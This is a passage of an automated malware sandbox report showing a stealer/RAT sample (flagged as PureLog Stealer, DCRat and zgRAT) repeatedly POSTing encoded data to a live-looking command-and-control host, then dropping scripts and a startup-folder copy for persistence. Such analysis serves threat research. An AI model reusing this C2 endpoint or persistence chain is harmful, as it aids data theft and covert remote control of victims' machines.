                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:00.087728024 CEST2532OUTData Raw: 5b 5b 59 55 5a 5a 5b 50 5c 5a 51 56 57 5c 57 5c 50 5e 5e 51 54 59 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [[YUZZ[P\ZQVW\W\P^^QTYSDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\821Z*Y7 [=//%/,0)^5!Z+(34'-;#G X/
                                                          Sep 8, 2024 11:54:00.413959026 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:00.607584000 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:00 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          142192.168.2.46483280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:54:00.746680975 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:01.103444099 CEST2532OUTData Raw: 5b 5d 5c 54 5f 5f 5b 5c 5c 5a 51 56 57 5f 57 53 50 5c 5e 5f 54 5a 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: []\T__[\\ZQVW_WSP\^_TZS@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^.1=Z?9'X4 (])<$Y)_/4;T0:(!)&+_'7-+#G X/1
                                                          Sep 8, 2024 11:54:01.420110941 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:01.552289963 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:00 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          143192.168.2.46483380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:54:01.683679104 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:02.042386055 CEST2532OUTData Raw: 5b 58 59 53 5f 5e 5b 5c 5c 5a 51 56 57 53 57 56 50 59 5e 5e 54 5d 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [XYS_^[\\ZQVWSWVPY^^T]SFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%/\> 0)<^3-7?W':<"=)+5 '4.;#G X/
                                                          Sep 8, 2024 11:54:02.348670959 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:02.476887941 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:01 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          144192.168.2.46483480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:54:02.616149902 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:02.962753057 CEST2532OUTData Raw: 5b 5f 59 53 5a 5f 5b 59 5c 5a 51 56 57 59 57 53 50 50 5e 51 54 58 53 47 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [_YSZ_[Y\ZQVWYWSPP^QTXSGTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^."-])(# 0]>Z7\0?2;<' 5>Y?&#Z'?-+#G X/)
                                                          Sep 8, 2024 11:54:03.296987057 CEST25INHTTP/1.1 100 Continue


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          145192.168.2.46483580.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:54:03.422836065 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:03.776407957 CEST1412OUTData Raw: 5e 5c 5c 50 5a 5d 5e 5c 5c 5a 51 56 57 53 57 51 50 5f 5e 58 54 59 53 45 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^\\PZ]^\\ZQVWSWQP_^XTYSETRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\.!>9/ 8\=<09[/<%9'5+%<'79#G X/
                                                          Sep 8, 2024 11:54:04.092274904 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:04.290366888 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 1e 26 2f 3d 5d 21 2d 38 0d 29 01 36 09 39 3d 24 58 29 5f 35 41 29 1d 12 1c 2b 3f 04 5e 2a 28 31 41 2a 5a 30 13 37 32 23 5c 25 0f 28 5e 03 11 23 58 23 2e 32 10 3e 3a 2d 07 3d 21 09 05 3e 01 3f 12 22 0a 3c 54 20 38 37 02 23 2b 3a 1a 3c 07 3a 50 2d 34 39 0b 2f 20 26 54 21 24 2d 57 0c 12 20 1a 28 10 23 53 20 55 3d 15 26 10 25 1f 24 35 29 03 2a 2b 26 50 2b 3b 32 59 25 0b 3b 56 24 03 26 00 29 2b 26 14 33 29 27 12 23 3d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &&/=]!-8)69=$X)_5A)+?^*(1A*Z072#\%(^#X#.2>:-=!>?"<T 87#+:<:P-49/ &T!$-W (#S U=&%$5)*+&P+;2Y%;V$&)+&3)'#=$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          146192.168.2.46483680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:54:03.553821087 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:03.902401924 CEST2532OUTData Raw: 5e 5e 5c 53 5a 52 5e 58 5c 5a 51 56 57 53 57 5d 50 5a 5e 5e 54 5f 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^^\SZR^X\ZQVWSW]PZ^^T_SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^;"!),4#;>7^$Y!_-4V0945>%?($-#G X/
                                                          Sep 8, 2024 11:54:04.226871967 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:04.356571913 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          147192.168.2.46483780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:54:04.487909079 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:54:04.837774992 CEST2532OUTData Raw: 5b 51 5c 51 5f 5f 5e 58 5c 5a 51 56 57 53 57 53 50 5e 5e 5f 54 5d 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Q\Q__^X\ZQVWSWSP^^_T]SFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&81&>9\ \),+]3<5\;'4$*<">=X?83$4\:#G X/
                                                          Sep 8, 2024 11:54:05.158730030 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:05.358500957 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          148192.168.2.46483880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:54:05.480218887 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:05.841722965 CEST2532OUTData Raw: 5e 59 59 52 5f 58 5e 5f 5c 5a 51 56 57 58 57 56 50 58 5e 5d 54 5c 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^YYR_X^_\ZQVWXWVPX^]T\SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%Z;11=9# X)</X3?/B4$_7!>-)%,'9#G X/-
                                                          Sep 8, 2024 11:54:06.155229092 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:06.285542011 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:05 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          149192.168.2.46483980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:54:06.421295881 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:54:06.775216103 CEST2532OUTData Raw: 5e 5a 59 54 5f 5e 5e 58 5c 5a 51 56 57 59 57 5d 50 5d 5e 50 54 58 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^ZYT_^^X\ZQVWYW]P]^PTXSFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%[,W>>_']#V/=('/2/+V$ 51+%,'4+.#G X/)
                                                          Sep 8, 2024 11:54:07.120095015 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:54:07.254661083 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:54:06 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:05:51:41
                                                          Start date:08/09/2024
                                                          Path:C:\Users\user\Desktop\kIdT4m0aa4.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\kIdT4m0aa4.exe"
                                                          Imagebase:0xcc0000
                                                          File size:4'201'265 bytes
                                                          MD5 hash:55A2312D6062E5BAC6C5F62A0EE42FA2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1682046441.000000000708F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1681650291.000000000678C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:05:51:42
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe"
                                                          Imagebase:0xec0000
                                                          File size:147'456 bytes
                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:05:51:48
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProviderWebSavesNet\4m3MAufDe8UYuW2ydRhKZQEREfiJBHvyHq5AIcSjywzlT6BxOyJV1br81hHR.bat" "
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:05:51:48
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:05:51:48
                                                          Start date:08/09/2024
                                                          Path:C:\ProviderWebSavesNet\hostcrt.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\ProviderWebSavesNet/hostcrt.exe"
                                                          Imagebase:0x610000
                                                          File size:3'879'424 bytes
                                                          MD5 hash:88340879F7B502B0EEE8F6147CDC70EB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1749800429.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1798966545.00000000130E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProviderWebSavesNet\hostcrt.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProviderWebSavesNet\hostcrt.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:05:51:52
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sBxboqxXs.bat"
                                                          Imagebase:0x7ff6b79e0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:05:51:52
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:05:51:53
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7ad9e0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:05:51:53
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\System32\PING.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:ping -n 10 localhost
                                                          Imagebase:0x7ff722be0000
                                                          File size:22'528 bytes
                                                          MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:05:52:02
                                                          Start date:08/09/2024
                                                          Path:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe"
                                                          Imagebase:0x730000
                                                          File size:3'879'424 bytes
                                                          MD5 hash:88340879F7B502B0EEE8F6147CDC70EB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.4164385410.0000000003213000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:false

                                                          General

                                                          Target ID:12
                                                          Start time:05:52:04
                                                          Start date:08/09/2024
                                                          Path:C:\Windows\System32\OpenWith.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                          Imagebase:0x7ff7ed500000
                                                          File size:123'984 bytes
                                                          MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:05:52:11
                                                          Start date:08/09/2024
                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe"
                                                          Imagebase:0xbe0000
                                                          File size:3'879'424 bytes
                                                          MD5 hash:88340879F7B502B0EEE8F6147CDC70EB
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:9.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:9.3%
                                                            Total number of Nodes:1511
                                                            Total number of Limit Nodes:40
